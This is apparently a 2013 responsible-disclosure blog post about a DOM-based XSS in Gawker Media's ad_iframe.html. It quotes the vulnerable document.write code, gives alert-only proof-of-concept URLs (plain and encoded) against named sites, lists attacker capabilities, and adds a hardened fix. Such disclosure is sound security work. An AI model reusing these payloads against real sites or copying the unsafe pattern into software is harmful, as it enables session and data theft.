Friday, September 6, 2013

Gizmodo, Lifehacker, Gawker - reflected DOM XSS

I'm a big follower of many of Gawker Media's websites - like Lifehacker and Gizmodo - and with that in mind I try to help them with their security.

Just cruising along on the Gizmodo website I found a problem that caught my attention: a request to a file called ad_iframe.html in the assets directory. Checking the source code of that file I found:
<script>
// source: the URL fragment, fully controlled by whoever crafts the link and never sent to the server
var location_parts = window.location.hash.substring(1).split('|');
var rand = location_parts[0];
var scriptsrc = decodeURIComponent(location_parts[1]);
// sink: the unvalidated value is concatenated straight into HTML markup
document.write("<scr"+"ipt src='" + scriptsrc + "'></scr"+"ipt>");
</script>
The variable scriptsrc is taken straight from location.hash and written into the page by document.write() without any validation or escaping.
By supplying the expected hash and pipe characters, a user could inject arbitrary markup and exploit this as a DOM-based XSS to obtain information.

How can this be exploited?

Proof-of-concept on Gizmodo:
http://gizmodo.com/assets/ad_iframe.html#|'></script><script>alert("xss by @dsopas");</script><div x='
Proof-of-concept on Gizmodo (encoded):
http://gizmodo.com/assets/ad_iframe.html#|'>%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%78%73%73%20%62%79%20%40%64%73%6F%70%61%73%22%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%64%69%76%20%78%3D%27
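As an added example (my own code, not Gawker Media's fix), here is how the same ad-loading logic can be written safely: the fragment is parsed, the script URL is checked against an allowlist of script hosts (the hosts used here are placeholders), and the element is created with DOM APIs instead of document.write, so the proof-of-concept fragment above is rejected before anything reaches the page.

```javascript
// Hardened replacement for the ad_iframe.html logic (added example, not the
// original page's or Gawker Media's code). The allowlist hosts are constructed
// placeholders, not real ad hosts.
const ALLOWED_SCRIPT_HOSTS = new Set(['ads.example.com', 'cdn.example.net']);

// Parse "#rand|encodedScriptSrc" into { rand, scriptsrc }, or return null when
// the fragment is malformed or the script URL is not an http(s) URL on the allowlist.
function parseAdFragment(hash, allowedHosts = ALLOWED_SCRIPT_HOSTS) {
  const parts = hash.replace(/^#/, '').split('|');
  if (parts.length !== 2) return null;
  const [rand, encoded] = parts;
  // The cache-buster must be a plain token; anything else is rejected outright.
  if (!/^[A-Za-z0-9_-]{1,32}$/.test(rand)) return null;
  let url;
  try {
    url = new URL(decodeURIComponent(encoded));
  } catch (e) {
    return null; // bad percent-encoding, or not an absolute URL at all
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return null;
  if (!allowedHosts.has(url.hostname)) return null;
  return { rand, scriptsrc: url.href };
}

// Insert the script through DOM properties instead of string concatenation.
// `doc` is passed in so the function can be exercised outside a browser.
function loadAdScript(doc, hash) {
  const parsed = parseAdFragment(hash);
  if (parsed === null) return false;
  const el = doc.createElement('script');
  el.src = parsed.scriptsrc; // assigned as a property, never parsed as HTML
  doc.head.appendChild(el);
  return true;
}

// In a browser this replaces the original inline script.
if (typeof window !== 'undefined') {
  loadAdScript(document, window.location.hash);
}
```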


A malicious user could also:

  • access other sites inside another client's private intranet.
  • steal another client's cookie(s).
  • modify another client's cookie(s).
  • steal another client's submitted form data.
  • modify another client's submitted form data (before it reaches the server).
  • submit a form to the application on the user's behalf which modifies passwords or other application data.

This DOM XSS vulnerability was present in many Gawker Media websites:
http://gawker.com/assets/ad_iframe.html
http://gizmodo.com/assets/ad_iframe.html
http://lifehacker.com/assets/ad_iframe.html
http://deadspin.com/assets/ad_iframe.html
http://io9.com/assets/ad_iframe.html
http://jalopnik.com/assets/ad_iframe.html
http://jezebel.com/assets/ad_iframe.html
http://kotaku.com/assets/ad_iframe.html
I want to thank the Gawker Media tech team for fixing this issue in less than 24 hours. They really care about security and their users.

Timeline:
02 Sep 2013: Reported to Gawker Media
03 Sep 2013: Gawker Media replied that a fix has been deployed
06 Sep 2013: Full disclosure
